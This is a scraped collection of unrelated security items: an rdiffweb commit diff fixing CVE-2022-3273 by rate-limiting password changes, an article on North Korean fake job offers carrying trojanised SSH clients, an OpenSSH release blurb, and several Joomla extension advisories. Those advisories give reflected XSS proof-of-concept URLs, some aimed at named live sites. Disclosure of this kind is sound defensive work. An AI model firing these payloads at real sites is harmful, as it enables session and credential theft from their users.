Allocation of Resources Without Limits or Throttling in GitHub repository ikus060/rdiffweb prior to 2.5.0a4.

  

@@ -132,6 +132,7 @@ This next release focus on two-factor-authentication as a measure to increase se

\* Generate a new session on login and 2FA #220

\* Enforce permission on /etc/rdiffweb configuration folder

\* Enforce validation on fullname, username and email

\* Limit incorrect attempts to change the user's password to prevent brute force attacks #225 \[CVE-2022-3273\](https://nvd.nist.gov/vuln/detail/CVE-2022-3273)

  

Breaking changes:

  

@@ -69,7 +69,7 @@ def flash(message, level='info'):

assert level in \['info', 'error', 'warning', 'success'\]

if 'flash' not in cherrypy.session: \# @UndefinedVariable

cherrypy.session\['flash'\] \= \[\] \# @UndefinedVariable

flash\_message \= FlashMessage(message, level)

flash\_message \= FlashMessage(str(message), level)

cherrypy.session\['flash'\].append(flash\_message)

  

  

@@ -159,7 +159,7 @@ def validate\_mfa(self, field):

def populate\_obj(self, userobj):

\# Save password if defined

if self.password.data:

userobj.set\_password(self.password.data, old\_password\=None)

userobj.set\_password(self.password.data)

userobj.role \= self.role.data

userobj.fullname \= self.fullname.data or ''

userobj.email \= self.email.data or ''

@@ -29,6 +29,10 @@

from rdiffweb.core.model import UserObject

from rdiffweb.tools.i18n import gettext\_lazy as \_

  

\# Maximum number of password change attempt before logout

CHANGE\_PASSWORD\_MAX\_ATTEMPT \= 5

CHANGE\_PASSWORD\_ATTEMPTS \= 'change\_password\_attempts'

  

  

class UserProfileForm(CherryForm):

action \= HiddenField(default\='set\_profile\_info')

@@ -85,11 +89,30 @@ def is\_submitted(self):

return super().is\_submitted() and self.action.data \== 'set\_password'

  

def populate\_obj(self, user):

try:

user.set\_password(self.new.data, old\_password\=self.current.data)

flash(\_("Password updated successfully."), level\='success')

except ValueError as e:

flash(str(e), level\='warning')

\# Check if current password is "valid" if Not, rate limit the

\# number of attempts and logout user after too many invalid attempts.

if not user.validate\_password(self.current.data):

cherrypy.session\[CHANGE\_PASSWORD\_ATTEMPTS\] \= cherrypy.session.get(CHANGE\_PASSWORD\_ATTEMPTS, 0) + 1

attempts \= cherrypy.session\[CHANGE\_PASSWORD\_ATTEMPTS\]

if attempts \>= CHANGE\_PASSWORD\_MAX\_ATTEMPT:

cherrypy.session.clear()

cherrypy.session.regenerate()

flash(

\_("You were logged out because you entered the wrong password too many times."),

level\='warning',

)

raise cherrypy.HTTPRedirect('/login/')

flash(\_("Wrong current password."), level\='warning')

else:

\# Clear number of attempts

if CHANGE\_PASSWORD\_ATTEMPTS in cherrypy.session:

del cherrypy.session\[CHANGE\_PASSWORD\_ATTEMPTS\]

\# If Valid, update password

try:

user.set\_password(self.new.data)

flash(\_("Password updated successfully."), level\='success')

except ValueError as e:

flash(str(e), level\='warning')

  

  

class RefreshForm(CherryForm):

@@ -182,7 +182,7 @@ def test\_change\_password\_with\_wrong\_confirmation(self):

  

def test\_change\_password\_with\_wrong\_password(self):

self.\_set\_password("oups", "pr3j5Dwi", "pr3j5Dwi")

self.assertInBody("Wrong password")

self.assertInBody("Wrong current password")

  

def test\_change\_password\_with\_too\_short(self):

self.\_set\_password(self.PASSWORD, "short", "short")

@@ -193,6 +193,21 @@ def test\_change\_password\_with\_too\_long(self):

self.\_set\_password(self.PASSWORD, new\_password, new\_password)

self.assertInBody("Password must have between 8 and 128 characters.")

  

def test\_change\_password\_too\_many\_attemps(self):

\# When udating user's password with wrong current password 5 times

for \_i in range(1, 5):

self.\_set\_password('wrong', "pr3j5Dwi", "pr3j5Dwi")

self.assertStatus(200)

self.assertInBody("Wrong current password.")

\# Then user session is cleared and user is redirect to login page

self.\_set\_password('wrong', "pr3j5Dwi", "pr3j5Dwi")

self.assertStatus(303)

self.assertHeaderItemValue('Location', self.baseurl + '/login/')

\# Then a warning message is displayed on login page

self.getPage('/login/')

self.assertStatus(200)

self.assertInBody('You were logged out because you entered the wrong password too many times.')

  

def test\_change\_password\_method\_get(self):

\# Given an authenticated user

\# Trying to update password with GET method

@@ -21,7 +21,6 @@

from cherrypy.process.plugins import SimplePlugin

  

from rdiffweb.core.model import UserObject

from rdiffweb.core.passwd import check\_password

  

logger \= logging.getLogger(\_\_name\_\_)

  

@@ -52,7 +51,7 @@ def authenticate(self, username, password):

Only verify the user's credentials using the database store.

"""

user \= UserObject.query.filter\_by(username\=username).first()

if user and check\_password(password, user.hash\_password):

if user and user.validate\_password(password):

return username, {}

return False

  

@@ -344,13 +344,12 @@ def is\_ldap(cls):

def is\_maintainer(self):

return self.role <= self.MAINTAINER\_ROLE

  

def set\_password(self, password, old\_password\=None):

def set\_password(self, password):

"""

Change the user's password. Raise a ValueError if the username or

the password are invalid.

"""

assert isinstance(password, str)

assert old\_password is None or isinstance(old\_password, str)

if not password:

raise ValueError("password can't be empty")

cfg \= cherrypy.tree.apps\[''\].cfg

@@ -359,9 +358,6 @@ def set\_password(self, password, old\_password=None):

if self.username \== cfg.admin\_user and cfg.admin\_password:

raise ValueError(\_("can't update admin-password defined in configuration file"))

  

if old\_password and not check\_password(old\_password, self.hash\_password):

raise ValueError(\_("Wrong password"))

  

\# Check password length

if cfg.password\_min\_length \> len(password) or len(password) \> cfg.password\_max\_length:

raise ValueError(

@@ -448,6 +444,9 @@ def validate\_access\_token(self, token):

return True

return False

  

def validate\_password(self, password):

return check\_password(password, self.hash\_password)

  

  

@event.listens\_for(UserObject.hash\_password, "set")

def hash\_password\_set(target, value, oldvalue, initiator):

@@ -200,28 +200,6 @@ def test\_set\_password\_update(self):

\# Check if listener called

self.listener.user\_password\_changed.assert\_called\_once\_with(userobj)

  

def test\_set\_password\_with\_old\_password(self):

\# Given a user in drabase with a password

userobj \= UserObject.add\_user('john', 'password')

self.listener.user\_password\_changed.reset\_mock()

\# When updating the user's password with old\_password

userobj.set\_password('new\_password', old\_password\='password')

\# Then password is SSHA

self.assertTrue(check\_password('new\_password', userobj.hash\_password))

\# Check if listener called

self.listener.user\_password\_changed.assert\_called\_once\_with(userobj)

  

def test\_set\_password\_with\_invalid\_old\_password(self):

\# Given a user in drabase with a password

userobj \= UserObject.add\_user('foo', 'password')

self.listener.user\_password\_changed.reset\_mock()

\# When updating the user's password with wrong old\_password

\# Then an exception is raised

with self.assertRaises(ValueError):

userobj.set\_password('new\_password', old\_password\='invalid')

\# Check if listener called

self.listener.user\_password\_changed.assert\_not\_called()

  

def test\_delete\_user(self):

\# Given an existing user in database

userobj \= UserObject.add\_user('vicky')

**0 comments on commit b5e3bb0**

Please sign in to comment.

CVE-2022-3273: Limit incorrect attempts to change the user's password to prevent bru… · ikus060/rdiffweb@b5e3bb0

Joomla KSAdvertiser extension version 2.5.37 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Heiner Klostermann - kiss-software.de                                      ││  Software : Joomla KSAdvertiser 2.5.37                                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'fSpS' is vulnerable to XSShttps://www.kiss-software.de/index.php?option=com_ksadvertiser&view=items&Itemid=0&filtercat=50&fSpS=KGNjLmlkID0gNTAgT1IgY2MucGFyZW50X2lkID0gNTApfChhLml0X2lkZW50PScxJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUxJScpfChhLnRpdGxlPScyJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUyJScpfChhLml0X2ludHJvPSczJyBPUiBhLml0X3Bob25ldGljIExJS0UgJyUzJScpfCgoYS5pdF9hZGRyZXNzPSc0JyBPUiBhLml0X3Bob25ldGljIExJS0UgJyU0JScpIEFORCBhLml0X2JveG51bWJlciA9IDApfCgoYS5pdF9wb3N0Y29kZT0nNScgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNSUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKXwoKGEuaXRfY2l0eT0nNicgT1IgYS5pdF9waG9uZXRpYyBMSUtFICclNiUnKSBBTkQgYS5pdF9ib3hudW1iZXIgPSAwKWg1bjZsPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmlyYzdu&lang=en[-] Done

Joomla KSAdvertiser 2.5.37 Cross Site Scripting

Joomla JoomBri Careers extension version 3.3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Joomla JoomBri Careers 3.3.0                                               ││  Software : JoomBri Team                                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /for-jobseekers/search-jobsGET parameter 'keyword' is vulnerable to XSShttps://target.com/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3d%22alert(1)%22autofocus%3d%22ak5aghi5u9p&location_id=2&jobtype_id=1&industry_id%5B%5D=2&functional_id%5B%5D=2&education_id%5B%5D=2&limit=20&option=com_career&task=[-] Done

Joomla JoomBri Careers 3.3.0 Cross Site Scripting

Joomla JoomBri Freelance extension version 4.5.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Joomla JoomBri Freelance 4.5.0                                             ││  Software : JoomBri Team                                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'keyword' is vulnerable to XSShttps://target.com/index.php?keyword=xfz9b%22onfocus%3d%22alert(1)%22autofocus%3d%22nyn0r[-] Done

Posted: October 5, 2022 by

Microsoft researchers are warning of fake job offers where the only actual compensation available is a golden handshake of malware and trickery. The campaign targets those with technical know-how because, despite what some may think, scams are for everybody, not just people unfamiliar with tech. With the right tactics and messaging, anyone is a potential target.

**A focused target list**

The attack targets people working in defence, media careers, aerospace, and IT services. You know, the kind of people who might have access confidential information, sensitive data, journalists, important passwords etc.

The danger here is not simply the initial compromise, but where it can lead. With access to a compromised system attackers have a bridgehead they can use to move into networks, exposing servers, databases, mailboxes, you name it. The starting and ending points for any given attack would be quite different, beginning in one industry and ending in another.

**How the attack works**

Microsoft attributes the attacks to a state-sponsored group it calls ZINC, which operates from North Korea. This group is all about theft and espionage, so the target list up above makes sense.

The way the attacks work tends to follow a similar pattern:

1.  Bogus LinkedIn profiles claiming to be recruiters in the US, UK, and India, scouting for talent. Potential victims are enticed into applying for non-existent posts at genuine companies.
    
2.  Victims are sent tampered versions of open-source software, away from LinkedIn. It’s the classic “move the victim away from the potential safety of the starting point” technique. MSFT researchers claim to have seen “at least” five methods of delivering infected applications to would-be job applicants.
    
3.  Tampered software includes KiTTY and PuTTY, both of which are popular secure shell (SSH) clients used for remote administration of computers. There’s also TightVNC, muPDF/Subliminal Recording, and Sumatra PDF Reader.
    
4.  The compromised software works in similar, but different ways. In order to avoid detection the software may require certain conditions to be met. For example, MSFT research mentions that weaponised copies of TightVNC Viewer will only install a backdoor when it's used to connect to particular host.
    
5.  Infected machines connect to a command and control (C2) server, used to monitor, issue commands, and install additional malware as and when it's needed.
    

**Bogus jobs: An endless scourge**

Fake job offers are a perennial favourite of malware slingers everywhere. Scammers don't have to guess what would-be job applicants want, so targeting them is easy, and applicants may be more willing to lower their guard, and may be less likely to alert HR or security about suspicious activity.

For example: If someone sends an employee a dubious PDF attachment they have no reason not to report it if they think it might be malicious. On the other hand, if an employee is looking for another job and someone sends them a bogus job offer or interview request, will they want to alert security about it and reveal that they're thinking of leaving the company?

This is why it’s essential to spot the flaws in job offers which sound too good to be true. As many of these attacks ride the coat-tails of legitimate businesses, the ball is actually in the victim’s court. Find the employment details for the business in question, and approach the organisation directly. If the supposed offer is bogus, you’ll know right away and can safely delete any and all rogue correspondence. Who knows, your enquiring nature may even makes yours a name a theoretical future employer may remember!

**RELATED ARTICLES**

Bogus job offers hide trojanised open-source software

Joomla RAXO All-Mode PRO extension version 2.01 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : RAXO Group - raxo.org                                                      ││  Software : Joomla RAXO All-mode PRO 2.01                                              ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /search-resultsGET parameter 'search' is vulnerable to XSShttps://www.target.com/search-results?search=hep3l%22onfocus%3d%22alert(1)%22autofocus%3d%22oakzt[-] Done

Joomla RAXO All-Mode PRO 2.01 Cross Site Scripting

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

OpenSSH 9.1p1

Joomla Rentalot Plus extension version 19.05 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Les Arbres Design                                                          ││  Software : Joomla Rentalot Plus 19.05                                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /check-viewGET parameter 'instance' is vulnerable to XSShttps://demo.lesarbresdesign.info/check-view?option=com_rentalotplus&controller=check&task=ajax_get_availability&format=raw&tmpl=component&version=detailed&datefrom=&currency=undefined&instance=byhiw"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"onuph[-] Done

Joomla Rentalot Plus 19.05 Cross Site Scripting

Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Team MarvikShop                                                            ││  Software : Joomla MarvikShop ShoppingCart 3.4                                         ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /en/index.phpGET parameter 'sortdir' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a onerror=alert(1)>vh217GET parameter 'limitstart' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a onerror=alert(1)>fe7s7GET parameter 'limit' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a onerror=alert(1)>tquly[-] Done

Joomla MarvikShop ShoppingCart 3.4 Cross Site Scripting

Joomla Easy Shop extension version 1.4.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JoomTech - joomtech.net                                                    ││  Software : Joomla Easy Shop 1.4.1                                                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path:/supermarket/index.phpGET parameter 'file' is vulnerable to XSShttps://demo.joomtech.net/supermarket/index.php?option=com_easyshop&task=ajax.loadImage&file=YXNzZXRzL2ltYWdlcy91c2VyX2N1c3RvbWVycy81NjMvYmFubmVyMi5qcGdzcW9obDxpbWcgc3JjPWEgb25lcnJvcj1hbGVydCgxKT5peG1kYw%3d%3d&size=medium[-] Done

Tag

#ssh